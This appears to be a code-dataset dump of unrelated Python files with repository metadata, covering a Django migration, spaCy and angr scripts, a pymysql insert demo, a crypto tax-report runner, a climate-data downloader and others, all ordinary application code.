] | null | null | null |
SmartBuild/modules/migrations/0003_module_shortcut.py
|
ampamo/smart-build
|
a0c9a3871eb7ca06a6cd6d4a15aba70e2291f4fb
|
[
"CC0-1.0"
] | null | null | null |
SmartBuild/modules/migrations/0003_module_shortcut.py
|
ampamo/smart-build
|
a0c9a3871eb7ca06a6cd6d4a15aba70e2291f4fb
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('modules', '0002_module_floor'),
]
operations = [
migrations.AddField(
model_name='module',
name='shortcut',
field=models.BooleanField(default=False),
),
]
| 19.95
| 53
| 0.601504
| 290
| 0.726817
| 0
| 0
| 0
| 0
| 0
| 0
| 69
| 0.172932
|
4273f06b359f41b03bbac8b02773bc579762c6fd
| 6,789
|
py
|
Python
|
app/common.py
|
yxonic/dl-boilerplate
|
d503716ad514929ddfdc41341e37b0e3f1a1f0f5
|
[
"MIT"
] | 1
|
2017-09-26T05:13:19.000Z
|
2017-09-26T05:13:19.000Z
|
app/common.py
|
yxonic/dl-boilerplate
|
d503716ad514929ddfdc41341e37b0e3f1a1f0f5
|
[
"MIT"
] | null | null | null |
app/common.py
|
yxonic/dl-boilerplate
|
d503716ad514929ddfdc41341e37b0e3f1a1f0f5
|
[
"MIT"
] | null | null | null |
import abc
import argparse
import logging
import pathlib
from collections import namedtuple
from operator import itemgetter
import toml
class NotConfiguredError(Exception):
pass
class ParseError(Exception):
pass
class Model(abc.ABC):
"""Interface for model that can save/load parameters.
Each model class should have an ``_add_argument`` class method to define
model arguments along with their types, default values, etc.
"""
@classmethod
@abc.abstractmethod
def add_arguments(cls, parser: argparse.ArgumentParser):
"""Add arguments to an argparse subparser."""
raise NotImplementedError
@classmethod
def build(cls, **kwargs):
"""Build model. Parameters are specified by keyword arguments.
Example:
>>> from models import Simple
>>> model = Simple.build(foo=3)
>>> print(model.config)
Config(foo=3)
"""
keys, values = zip(*sorted(list(kwargs.items()), key=itemgetter(0)))
config = namedtuple(cls.__name__, keys)(*values)
return cls(config)
@classmethod
def parse(cls, args):
"""Parse command-line options and build model."""
class _ArgumentParser(argparse.ArgumentParser):
def error(self, message):
raise ParseError(message)
parser = _ArgumentParser(prog='', add_help=False)
cls.add_arguments(parser)
args = parser.parse_args(args)
config = dict(args._get_kwargs())
Model._unfold_config(config)
return cls.build(**config)
def __init__(self, config):
"""
Args:
config (namedtuple): model configuration
"""
self.config = config
def __str__(self):
return str(self.config)
@staticmethod
def _unfold_config(cfg):
for k, v in list(cfg.items()):
if isinstance(v, dict):
Model._unfold_config(v)
if '.' not in k:
continue
d = cfg
for sec in k.split('.')[:-1]:
if sec in d:
d = d[sec]
else:
d[sec] = {}
d = d[sec]
d[k.split('.')[-1]] = v
del cfg[k]
class Workspace:
"""Workspace utilities. One can save/load configurations, build models
with specific configuration, save snapshots, open results, etc., using
workspace objects."""
def __init__(self, path: str, model=None, config=None):
self._path = pathlib.Path(path)
self._log_path = self._path / 'log'
self._snapshot_path = self._path / 'snapshot'
self._result_path = self._path / 'result'
if model is None:
self._model_cls = None
self._config = None
return
if config is None:
config = {}
self._set_model(model, config)
self._save()
def __str__(self):
return str(self.path)
def __repr__(self):
return 'Workspace(path=' + str(self.path) + ')'
def _set_model(self, model, config):
if isinstance(model, str):
self._model_cls = Workspace._get_class(model)
else:
self._model_cls = model
self._config = config
@staticmethod
def _get_class(name):
from . import models as mm
return getattr(mm, name)
@property
def path(self):
if not self._path.exists():
self._path.mkdir(parents=True)
return self._path
@property
def result_path(self):
if not self._result_path.exists():
self._result_path.mkdir(parents=True)
return self._result_path
@property
def snapshot_path(self):
if not self._snapshot_path.exists():
self._snapshot_path.mkdir(parents=True)
return self._snapshot_path
@property
def log_path(self):
if not self._log_path.exists():
self._log_path.mkdir(parents=True)
return self._log_path
@property
def model_name(self):
return self.model_cls.__name__
@property
def model_cls(self):
if self._model_cls is not None:
return self._model_cls
self._load()
return self._model_cls
@property
def config(self):
if self._config is not None:
return self._config
self._load()
return self._config
def setup_like(self, model: Model):
"""Configure workspace with configurations from a given model.
Args:
model (Model): model to be used
"""
self._set_model(model.__class__, model.config._asdict())
def build_model(self):
"""Build model according to the configurations in current
workspace."""
return self.model_cls.build(**self.config)
def logger(self, name: str):
"""Get a logger that logs to a file.
Notice that same logger instance is returned for same names.
Args:
name(str): logger name
"""
logger = logging.getLogger(name)
if logger.handlers:
# previously configured, remain unchanged
return logger
fileFormatter = logging.Formatter('%(levelname)s [%(name)s] '
'%(asctime)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fileHandler = logging.FileHandler(
str(self.log_path / (name + '.log')))
fileHandler.setFormatter(fileFormatter)
logger.addHandler(fileHandler)
return logger
def _load(self):
"""Load configuration."""
try:
cfg = toml.load((self.path / 'config.toml').open())
self._set_model(cfg['model_name'], cfg[cfg['model_name'].lower()])
except (FileNotFoundError, KeyError):
raise NotConfiguredError('config.toml doesn\'t exist or '
'is incomplete')
def _save(self):
"""Save configuration."""
f = (self.path / 'config.toml').open('w')
toml.dump({'model_name': self.model_name,
self.model_name.lower(): self.config}, f)
f.close()
class Command(abc.ABC):
"""Command interface."""
def __init__(self, parser):
self.parser = parser
def _run(self, args):
ws = Workspace(args.workspace)
cmd = args.command
del args.command, args.func, args.workspace
args = {name: value for (name, value) in args._get_kwargs()}
args = namedtuple(cmd.capitalize(), args.keys())(*args.values())
return self.run(ws, args)
@abc.abstractmethod
def run(self, ws, args):
raise NotImplementedError
| 28.405858
| 78
| 0.577405
| 6,637
| 0.977611
| 0
| 0
| 2,782
| 0.409781
| 0
| 0
| 1,529
| 0.225217
|
4274e96e6ce5245f31a18bf5087d02fdafd53341
| 2,737
|
py
|
Python
|
training/train_pos_dep.py
|
ex00/spacy-ru
|
7284d8127dca322fcc2aa9ce0267699cfc9baf38
|
[
"MIT"
] | null | null | null |
training/train_pos_dep.py
|
ex00/spacy-ru
|
7284d8127dca322fcc2aa9ce0267699cfc9baf38
|
[
"MIT"
] | null | null | null |
training/train_pos_dep.py
|
ex00/spacy-ru
|
7284d8127dca322fcc2aa9ce0267699cfc9baf38
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals, print_function
import sys
from pathlib import Path
import spacy
from spacy.lang.ru import Russian
from spacy.pipeline import Tagger, DependencyParser
from spacy.util import fix_random_seed, set_lang_class
from models.dep import MyDEP
from models.loadvec import get_ft_vec
from models.pos import MyPOS
from models.t2v import build_tok2vec
from training.corpora.syntagrus import get_syntagrus_example, get_syntagrus
from training.trainer import Trainer, Extractor
from utils.corpus import tag_morphology
CFG = {"device": 0, 'verbose': 1}
GPU_1 = "-g1" in sys.argv[1:]
if GPU_1:
CFG["device"] = 1
TESTS = False
spacy.require_gpu(CFG['device'])
TEST_MODE = "--test" in sys.argv[1:]
if TEST_MODE:
SynTagRus = get_syntagrus_example(Path("data/syntagrus/"))
else:
SynTagRus = get_syntagrus(Path("data/syntagrus/"))
def create_pos(nlp, cls=MyPOS, labels=[], **opts):
pos = cls(nlp.vocab, **opts)
for e in labels:
pos.add_label(e, tag_morphology(e))
return pos
def create_dep(nlp, cls=MyDEP, labels=[], **opts):
dep = cls(nlp.vocab, **opts)
# for e in labels:
# dep.add_label(e)
return dep
ft_vectors = get_ft_vec()
tok2vec = build_tok2vec(embed_size=2000, vectors={"word_vectors": ft_vectors})
def smoke_test():
nlp = spacy.blank("ru")
nlp.add_pipe(create_pos(nlp))
nlp.add_pipe(create_dep(nlp))
nlp.vocab.morphology.tag_map.clear()
nlp.begin_training(tok2vec=tok2vec, **CFG)
if TEST_MODE:
print(nlp.pipeline)
dep = nlp.get_pipe('parser')
if TEST_MODE:
print(dep(nlp.tokenizer("приветы всем")))
class Russian2(Russian):
lang = "ru"
def train_spacy(nlp, epochs):
# set_lang_class('ru2', Russian2)
extractor = Extractor()
cfg = {'tok2vec': tok2vec, **CFG}
fix_random_seed()
trainer = Trainer(nlp, SynTagRus.ds_train, SynTagRus.ds_test, extractor, **cfg)
nlp.vocab.morphology.tag_map.clear()
trainer.train(epochs=epochs)
def main():
smoke_test()
nlp = spacy.blank("ru")
nlp.vocab.morphology.tag_map.clear()
nlp.add_pipe(create_pos(nlp, labels=[]))
nlp.add_pipe(create_dep(nlp, labels=[], config={'learn_tokens': False}))
# nlp.add_pipe(create_pos(nlp, cls=Tagger, labels=SynTagRus.pos))
# nlp.add_pipe(create_dep(nlp, cls=DependencyParser, labels=SynTagRus.dep, config={'learn_tokens': False}))
if TEST_MODE:
print(nlp.pipeline)
# nlp.add_pipe(create_pos(nlp, labels=SynTagRus.pos))
# nlp.add_pipe(create_dep(nlp, labels=SynTagRus.dep, config={'learn_tokens': False}))
if TEST_MODE:
train_spacy(nlp, epochs=5)
else:
train_spacy(nlp, epochs=50)
if __name__ == "__main__":
main()
| 27.646465
| 111
| 0.700037
| 40
| 0.014556
| 0
| 0
| 0
| 0
| 0
| 0
| 554
| 0.201601
|
4275177baedf41f1ab31ef0704dfda58eb058f5e
| 1,512
|
py
|
Python
|
tests/test_peephole_optimizations.py
|
capuanob/angr
|
4e5bb119965cb282f5bcb3dea5b598e88097f715
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_peephole_optimizations.py
|
capuanob/angr
|
4e5bb119965cb282f5bcb3dea5b598e88097f715
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_peephole_optimizations.py
|
capuanob/angr
|
4e5bb119965cb282f5bcb3dea5b598e88097f715
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=missing-class-docstring,no-self-use
import os
import unittest
import archinfo
import ailment
import angr
from angr.analyses.decompiler.peephole_optimizations import ConstantDereferences
test_location = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'binaries', 'tests')
class TestPeepholeOptimizations(unittest.TestCase):
def test_constant_dereference(self):
# a = *(A) :=> a = the variable at at A iff
# - A is a pointer that points to a read-only section.
proj = angr.Project(os.path.join(test_location, "armel", "decompiler", "rm"), auto_load_libs=False)
expr = ailment.Expr.Load(None, ailment.Expr.Const(None, None, 0xa000, proj.arch.bits),
proj.arch.bytes, archinfo.Endness.LE, ins_addr=0x400100)
opt = ConstantDereferences(proj, proj.kb, 0)
optimized = opt.optimize(expr)
assert isinstance(optimized, ailment.Const)
assert optimized.value == 0x183f8
assert optimized.tags.get('ins_addr', None) == 0x400100, "Peephole optimizer lost tags."
# multiple cases that no optimization should happen
# a. Loading a pointer from a writable location
expr = ailment.Expr.Load(None, ailment.Expr.Const(None, None, 0x21df4, proj.arch.bits), 1, archinfo.Endness.LE)
opt = ConstantDereferences(proj, proj.kb, 0)
optimized = opt.optimize(expr)
assert optimized is None
if __name__ == "__main__":
unittest.main()
| 38.769231
| 119
| 0.683201
| 1,148
| 0.759259
| 0
| 0
| 0
| 0
| 0
| 0
| 346
| 0.228836
|
42755fd81a38eefae8f526ffb8db205e1141d33b
| 604
|
py
|
Python
|
PySpace/mysql/mysql_insertdata.py
|
dralee/LearningRepository
|
4324d3c5ac1a12dde17ae70c1eb7f3d36a047ba4
|
[
"Apache-2.0"
] | null | null | null |
PySpace/mysql/mysql_insertdata.py
|
dralee/LearningRepository
|
4324d3c5ac1a12dde17ae70c1eb7f3d36a047ba4
|
[
"Apache-2.0"
] | null | null | null |
PySpace/mysql/mysql_insertdata.py
|
dralee/LearningRepository
|
4324d3c5ac1a12dde17ae70c1eb7f3d36a047ba4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
# 文件名:mysql_createtable.py
import pymysql
# 打开数据库连接
db = pymysql.connect('localhost','root','1234','fdtest')
# 使用cursor()方法创建一个游标对象cursor
cursor = db.cursor()
# SQL插入语句
sql = """INSERT INTO EMPLOYEE(
FIRST_NAME,LAST_NAME,AGE,SEX,INCOME)
VALUES('Mac2','Mohan2',20,'M',6000)"""
"""
或
sql = "INSERT INTO EMPLOYEE(FIRST_NAME, \
LAST_NAME, AGE, SEX, INCOME) \
VALUES ('%s', '%s', '%d', '%c', '%d' )" % \
('Mac', 'Mohan', 20, 'M', 2000)
"""
try:
# 执行sql语句
cursor.execute(sql)
# 提交到数据库执行
db.commit()
except:
# 如发生错误则回滚
db.rollback()
# 关闭数据库连接
db.close()
| 16.777778
| 56
| 0.61755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 552
| 0.773109
|
42787867fa3db8b6721924f36a9b0de8973ee0ae
| 1,572
|
py
|
Python
|
appleseed_python.py
|
AllegorithmicSAS/sat-scons
|
3eea609385fb9bdd93562097d302a3707c3c6ebe
|
[
"BSD-3-Clause"
] | 25
|
2018-09-17T00:10:30.000Z
|
2021-11-07T06:41:35.000Z
|
appleseed_python.py
|
AllegorithmicSAS/sat-scons
|
3eea609385fb9bdd93562097d302a3707c3c6ebe
|
[
"BSD-3-Clause"
] | null | null | null |
appleseed_python.py
|
AllegorithmicSAS/sat-scons
|
3eea609385fb9bdd93562097d302a3707c3c6ebe
|
[
"BSD-3-Clause"
] | 3
|
2018-08-28T15:01:43.000Z
|
2021-05-04T16:54:51.000Z
|
import os
import subprocess
import threading
mutex = threading.Lock()
def render_appleseed(target_file, base_color_tex, normal_tex, roughness_tex, metallic_tex, resolution, appleseed_path):
mutex.acquire()
try:
# Read the template file from disk.
with open("scene_template.appleseed", "r") as file:
project_text = file.read()
# Substitute variables by their values.
project_text = project_text.replace("$baseColorTexturePath", base_color_tex)
project_text = project_text.replace("$normalTexturePath", normal_tex)
project_text = project_text.replace("$roughnessTexturePath", roughness_tex)
project_text = project_text.replace("$metallicTexturePath", metallic_tex)
project_text = project_text.replace("$frameWidth", str(resolution[0]))
project_text = project_text.replace("$frameHeight", str(resolution[1]))
# Write the new project file to disk.
project_file = os.path.splitext(target_file)[0] + ".appleseed"
with open(project_file, "w") as file:
file.write(project_text)
# Invoke appleseed to render the project file.
appleseed_cli_path = os.path.join(appleseed_path, "bin", "appleseed.cli.exe" if os.name == "nt" else "appleseed.cli")
subprocess.check_call([appleseed_cli_path, "--message-verbosity", "error", project_file, "--output", target_file])
except Exception as e:
print("Failed to generate {0} with appleseed: {1}".format(target_file, e))
raise
finally:
mutex.release()
| 40.307692
| 125
| 0.688295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 441
| 0.280534
|
42793637f0ad1d6b8bdb63c8ad74420df516a382
| 1,327
|
py
|
Python
|
conjureup/ui/views/credentials.py
|
iMichka/conjure-up
|
8e4599e6f58b52163384150d8d71e7802462d126
|
[
"MIT"
] | 1
|
2019-06-26T23:39:13.000Z
|
2019-06-26T23:39:13.000Z
|
conjureup/ui/views/credentials.py
|
iMichka/conjure-up
|
8e4599e6f58b52163384150d8d71e7802462d126
|
[
"MIT"
] | null | null | null |
conjureup/ui/views/credentials.py
|
iMichka/conjure-up
|
8e4599e6f58b52163384150d8d71e7802462d126
|
[
"MIT"
] | 1
|
2020-10-05T14:42:31.000Z
|
2020-10-05T14:42:31.000Z
|
from ubuntui.utils import Padding
from ubuntui.widgets.hr import HR
from conjureup.app_config import app
from conjureup.ui.views.base import BaseView, SchemaFormView
from conjureup.ui.widgets.selectors import MenuSelectButtonList
class NewCredentialView(SchemaFormView):
title = "New Credential Creation"
def __init__(self, *args, **kwargs):
cloud_type = app.provider.cloud_type.upper()
self.subtitle = "Enter your {} credentials".format(cloud_type)
super().__init__(*args, **kwargs)
class CredentialPickerView(BaseView):
title = "Choose a Credential"
subtitle = "Please select an existing credential, " \
"or choose to add a new one."
footer = 'Please press [ENTER] on highlighted credential to proceed.'
def __init__(self, credentials, default, submit_cb, back_cb):
self.credentials = credentials
self.default = default
self.submit_cb = submit_cb
self.prev_screen = back_cb
super().__init__()
def build_widget(self):
widget = MenuSelectButtonList(self.credentials, self.default)
widget.append(Padding.line_break(""))
widget.append(HR())
widget.append_option("Add a new credential", None)
return widget
def submit(self):
self.submit_cb(self.widget.selected)
| 33.175
| 73
| 0.694047
| 1,090
| 0.821402
| 0
| 0
| 0
| 0
| 0
| 0
| 226
| 0.170309
|
427ab04e73a73ae528a76eac0fdda4742addfcf9
| 355
|
py
|
Python
|
sleekxmpp/plugins/__init__.py
|
aristanetworks/SleekXMPP
|
91f53bf1964a564f6f12477a31884e9ec38cef75
|
[
"MIT"
] | null | null | null |
sleekxmpp/plugins/__init__.py
|
aristanetworks/SleekXMPP
|
91f53bf1964a564f6f12477a31884e9ec38cef75
|
[
"MIT"
] | 1
|
2020-04-10T22:09:06.000Z
|
2020-04-10T22:09:06.000Z
|
sleekxmpp/plugins/__init__.py
|
aristanetworks/SleekXMPP
|
91f53bf1964a564f6f12477a31884e9ec38cef75
|
[
"MIT"
] | 1
|
2019-12-05T12:10:16.000Z
|
2019-12-05T12:10:16.000Z
|
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
__all__ = ['xep_0004', 'xep_0012', 'xep_0030', 'xep_0033', 'xep_0045',
'xep_0050', 'xep_0085', 'xep_0092', 'xep_0199', 'gmail_notify',
'xep_0060', 'xep_0202']
| 32.272727
| 74
| 0.63662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 297
| 0.83662
|
427af261bc83da6fc8ac5c1ea1e2a2473e51e220
| 5,276
|
py
|
Python
|
main.py
|
pwillworth/dfkreport
|
ae10226430a3a74ac3c07ae888cab14dde778db8
|
[
"Apache-2.0"
] | 11
|
2022-01-18T17:36:12.000Z
|
2022-03-21T21:09:17.000Z
|
main.py
|
pwillworth/dfkreport
|
ae10226430a3a74ac3c07ae888cab14dde778db8
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
pwillworth/dfkreport
|
ae10226430a3a74ac3c07ae888cab14dde778db8
|
[
"Apache-2.0"
] | 4
|
2022-01-18T18:37:48.000Z
|
2022-01-22T02:14:48.000Z
|
#!/usr/bin/env python3
import transactions
import taxmap
import db
import settings
import datetime
import argparse
import uuid
import pickle
import jsonpickle
import logging
import logging.handlers
import traceback
def main():
handler = logging.handlers.RotatingFileHandler('../main.log', maxBytes=33554432, backupCount=10)
logging.basicConfig(handlers=[handler], level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logging.info('We got a report request')
parser = argparse.ArgumentParser()
parser.add_argument("wallet", help="The evm compatible wallet address to generate for")
parser.add_argument("startDate", help="The starting date for the report")
parser.add_argument("endDate", help="The ending date for the report")
parser.add_argument("--costbasis", choices=['fifo','lifo','hifo','acb'], help="Method for mapping cost basis to gains")
parser.add_argument("--chains", choices=['1','2','3','4','5','6','7'], help="Bitwise integer of blockchains to include 1=Harmony,2=Avax,4=DFKChain")
args = parser.parse_args()
if args.costbasis == None:
costBasis = 'fifo'
else:
costBasis = args.costbasis
page_size = settings.TX_PAGE_SIZE
txResult = 0
txData = []
moreOptions = db.ReportOptions()
# list of transactions if loaded from file if available, otherwise fetched
reportInfo = db.findReport(args.wallet, args.startDate, args.endDate)
if reportInfo != None and reportInfo[5] > 0 and len(reportInfo[8]) > 0:
includedChains = reportInfo[12]
with open('../transactions/{0}'.format(reportInfo[8]), 'rb') as file:
txData = pickle.load(file)
else:
# generate.py pre-generates report record, but if running outside of that, create one
if reportInfo == None:
generateTime = datetime.datetime.now()
txResult = transactions.getTransactionCount(args.wallet)
includedChains = 1
db.createReport(args.wallet, args.startDate, args.endDate, int(datetime.datetime.timestamp(generateTime)), txResult, costBasis, includedChains, 1)
else:
includedChains = reportInfo[12]
try:
moreOptions = jsonpickle.loads(reportInfo[13])
except Exception as err:
logging.warning('Ignoring failure to load more options, probably old ui not setting it.')
logging.info('Loading transactions list for {0}'.format(args.wallet))
# Scale up default page size for very large accounts
if reportInfo != None and reportInfo[4] > page_size*50:
page_size = min(1000, page_size*5)
try:
txData = transactions.getTransactionList(args.wallet, args.startDate, args.endDate, page_size, includedChains)
except Exception as err:
logging.error('Unexpected Error {0} fetching transaction list, setting report to failure.'.format(err))
traceback.print_exc()
db.updateReportError(args.wallet, args.startDate, args.endDate, 8)
return 1
# The transactions are written to a file and record updated indicate fetching complete
transactionsFile = uuid.uuid4().hex
with open('../transactions/{0}'.format(transactionsFile), 'wb') as f:
pickle.dump(txData, f)
try:
db.completeTransactions(args.wallet, args.startDate, args.endDate, transactionsFile)
except Exception as err:
logging.error('DB report update tx complete failure: {0}'.format(str(err)))
# With transaction list, we now generate the events and tax map
try:
reportData = taxmap.buildTaxMap(txData, args.wallet, datetime.datetime.strptime(args.startDate, '%Y-%m-%d').date(), datetime.datetime.strptime(args.endDate, '%Y-%m-%d').date(), costBasis, includedChains, moreOptions)
except Exception as err:
logging.error('Unexpected Error {0} building tax map, setting report to failure.'.format(err))
traceback.print_exc()
# Set a different code when web3.exceptions.TransactionNotFound
# so we can relay that it is about network rpc issue, try later
if str(err) == "{'message': 'Relay attempts exhausted', 'code': -32050}":
statusCode = 8
elif "Bad Gateway for url" in str(err) or "Service Unavailable" in str(err) or "Max retries exceeded" in str(err):
statusCode = 8
else:
statusCode = 9
try:
db.updateReportError(args.wallet, args.startDate, args.endDate, statusCode)
except Exception as err:
logging.error('DB report update error failure: {0}'.format(str(err)))
return 1
for item in reportData['taxes']:
logging.debug(str(item.__dict__) + '\n')
# The results are written to a file and record updated to notify completion
reportFile = uuid.uuid4().hex
with open('../reports/{0}'.format(reportFile), 'wb') as f:
pickle.dump(reportData, f)
try:
db.completeReport(args.wallet, args.startDate, args.endDate, reportFile)
except Exception as err:
logging.error('DB report update complete failure: {0}'.format(str(err)))
if __name__ == "__main__":
main()
| 47.531532
| 224
| 0.666035
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,624
| 0.307809
|
427b0f2bb086452498a9bfd3a4dc95c14c7879d6
| 127
|
py
|
Python
|
src/tarski/fstrips/contingent/__init__.py
|
phoeft670/tarski
|
7d955e535fbbca012bfd1a12402b97febc6b35b9
|
[
"Apache-2.0"
] | 29
|
2018-11-26T20:31:04.000Z
|
2021-12-29T11:08:40.000Z
|
src/tarski/fstrips/contingent/__init__.py
|
phoeft670/tarski
|
7d955e535fbbca012bfd1a12402b97febc6b35b9
|
[
"Apache-2.0"
] | 101
|
2018-06-07T13:10:01.000Z
|
2022-03-11T11:54:00.000Z
|
src/tarski/fstrips/contingent/__init__.py
|
phoeft670/tarski
|
7d955e535fbbca012bfd1a12402b97febc6b35b9
|
[
"Apache-2.0"
] | 18
|
2018-11-01T22:44:39.000Z
|
2022-02-28T04:57:15.000Z
|
from .problem import ContingentProblem as Problem
from .. action import Action
from .sensor import Sensor
from . import errors
| 25.4
| 49
| 0.811024
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
427bd9dc45f6695e499240fef94ddec3e4b3fe88
| 80
|
py
|
Python
|
p40-49/p48.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | 1
|
2015-10-11T15:53:00.000Z
|
2015-10-11T15:53:00.000Z
|
p40-49/p48.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | null | null | null |
p40-49/p48.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | null | null | null |
sum = 0
for i in xrange(1,1001):
sum = sum + i**i
print sum % 10000000000
| 11.428571
| 24
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
427dedadfbbcbe3c95d00fdafba41ac3a4018d6f
| 2,121
|
py
|
Python
|
property_proteome/length/run.py
|
rrazban/proteomevis_scripts
|
2b6309a78287ffab4ee745383c21b9f474b93b60
|
[
"MIT"
] | 1
|
2020-11-11T06:14:10.000Z
|
2020-11-11T06:14:10.000Z
|
property_proteome/length/run.py
|
rrazban/proteomevis_scripts
|
2b6309a78287ffab4ee745383c21b9f474b93b60
|
[
"MIT"
] | null | null | null |
property_proteome/length/run.py
|
rrazban/proteomevis_scripts
|
2b6309a78287ffab4ee745383c21b9f474b93b60
|
[
"MIT"
] | 1
|
2019-05-28T19:13:24.000Z
|
2019-05-28T19:13:24.000Z
|
#!/usr/bin/python
help_msg = 'get uniprot length of entire proteome'
import os, sys
CWD = os.getcwd()
UTLTS_DIR = CWD[:CWD.index('proteomevis_scripts')]+'/proteomevis_scripts/utlts'
sys.path.append(UTLTS_DIR)
from parse_user_input import help_message
from read_in_file import read_in
from parse_data import organism
from uniprot_api import UniProtAPI
from output import writeout
def parse_chain_length(words, i, verbose): #put this in class
if len(words)==1: #does not capture UniProt peptide case
if verbose:
print 'No chain found: {0}. Structure is discarded'.format(words)
length = ''
elif '>' in words[i+1]:
length = ''
elif '?' in words[i+1]:
length = ''
elif '?' in words[i] or '<' in words[i]:
if verbose:
print 'No starting residue for chain: {0}'.format(words)
length = int(words[i+1])
else:
length = int(words[i+1]) - int(words[i]) + 1
return length
class UniProtLength():
def __init__(self, verbose, d_ref):
self.verbose = verbose
self.d_ref = d_ref
uniprotapi = UniProtAPI(['id', 'feature(CHAIN)'])
if organism=='new_protherm':
print len(d_ref)
self.labels, self.raw_data = uniprotapi.uniprot_info(d_ref.keys())
else:
self.labels, self.raw_data = uniprotapi.organism_info()
self.d_output = {}
def run(self):
for line in self.raw_data:
words = line.split()
uniprot = words[self.labels.index('Entry')]
if uniprot in self.d_ref:
chain_length_i = self.labels.index('Chain')+1
chain_length = parse_chain_length(words, chain_length_i, self.verbose)
if chain_length:
self.d_output[uniprot] = chain_length
return self.d_output
if __name__ == "__main__":
args = help_message(help_msg, bool_add_verbose = True)
d_ref = read_in('Entry', 'Gene names (ordered locus )', filename = 'proteome')
uniprot_length = UniProtLength(args.verbose, d_ref)
d_output = uniprot_length.run()
if organism!='protherm':
d_output = {d_ref[uniprot]: res for uniprot, res in d_output.iteritems()}
xlabel = 'oln'
else: #not supported for ProTherm
xlabel = 'uniprot'
writeout([xlabel, 'length'], d_output, filename = 'UniProt')
| 29.054795
| 87
| 0.705799
| 726
| 0.342291
| 0
| 0
| 0
| 0
| 0
| 0
| 433
| 0.204149
|
427e1e9e41044ab46aedd645fb3078c3369fa522
| 2,086
|
py
|
Python
|
machine_learning/torch_time_series_forecasting/src/data/dataset.py
|
iimuz/til
|
b100438e8ce2f369331b3be215a4b9cdce9ffda5
|
[
"MIT"
] | 4
|
2020-07-25T01:20:08.000Z
|
2020-10-03T12:58:15.000Z
|
machine_learning/torch_time_series_forecasting/src/data/dataset.py
|
iimuz/til
|
b100438e8ce2f369331b3be215a4b9cdce9ffda5
|
[
"MIT"
] | 29
|
2019-09-30T08:04:14.000Z
|
2022-03-12T13:51:08.000Z
|
machine_learning/torch_time_series_forecasting/src/data/dataset.py
|
iimuz/til
|
b100438e8ce2f369331b3be215a4b9cdce9ffda5
|
[
"MIT"
] | 1
|
2020-08-14T05:15:51.000Z
|
2020-08-14T05:15:51.000Z
|
"""データセットをダウンロードするためのスクリプトです."""
# default packages
import logging
import pathlib
import traceback
import urllib.request as request
# third party
import pandas as pd
import tqdm as tqdm_std
# my packages
import src.data.directory as directory
# logger
logger = logging.getLogger(__name__)
class TqdmUpTo(tqdm_std.tqdm):
"""Provides `update_to(n)` which uses `tqdm.update(delta_n)`.
Args:
tqdm (tqdm): tqdm
"""
def update_to(self, b: int = 1, bsize: int = 1, tsize: int = None) -> None:
""" update function
Args:
b (int, optional): Number of blocks transferred. Defaults to 1.
bsize (int, optional): Size of each block (in tqdm units). Defaults to 1.
tsize ([type], optional): Total size (in tqdm units). Defaults to None.
"""
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def get_raw_filepath() -> pathlib.Path:
url = get_raw_url()
filepath = directory.get_raw().joinpath(url.split("/")[-1])
return filepath
def get_raw_url() -> str:
url = (
"https://storage.googleapis.com/tensorflow/tf-keras-datasets/"
"jena_climate_2009_2016.csv.zip"
)
return url
def _main() -> None:
"""メインの実行スクリプト."""
logging.basicConfig(level=logging.INFO)
filepath = get_raw_filepath()
if filepath.exists() is False:
url = get_raw_url()
filepath.parent.mkdir(exist_ok=True, parents=True)
with TqdmUpTo(
unit="B", unit_scale=True, miniters=1, desc=filepath.name
) as pbar:
request.urlretrieve(
url, filename=filepath, reporthook=pbar.update_to, data=None
)
else:
logger.info(f"data already exists: {filepath}")
# show dataset description.
df = pd.read_csv(filepath)
logger.info(df.info())
logger.info(df.head())
logger.info(df.tail())
if __name__ == "__main__":
try:
_main()
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
| 25.13253
| 85
| 0.622244
| 624
| 0.289157
| 0
| 0
| 0
| 0
| 0
| 0
| 743
| 0.3443
|
427f14f88f6ffd13fff4e9351ec1d15fe8db0b86
| 3,320
|
py
|
Python
|
app.py
|
aracnid/i-xero
|
2fb2f093a8a92e0ba2f4cdbe440e962a38c09f7e
|
[
"MIT"
] | null | null | null |
app.py
|
aracnid/i-xero
|
2fb2f093a8a92e0ba2f4cdbe440e962a38c09f7e
|
[
"MIT"
] | null | null | null |
app.py
|
aracnid/i-xero
|
2fb2f093a8a92e0ba2f4cdbe440e962a38c09f7e
|
[
"MIT"
] | null | null | null |
"""Primary application.
"""
import json
import logging
import logging.config
import os
import sys
from flask import url_for, render_template, redirect, request
from i_xero import Xero2
from i_xero.i_flask import FlaskInterface
from utils import jsonify, serialize_model
# initialize logging
# The SlackBot app doesn't handle logging in the same way.
# I tried to pass in a logger object from aracnid_logger,
# but it seems to disable all loggers
logging_filename = os.environ.get('LOGGING_CONFIG_FILE')
command_dir = os.path.dirname(sys.argv[0])
logging_dir = os.path.join(os.getcwd(), command_dir)
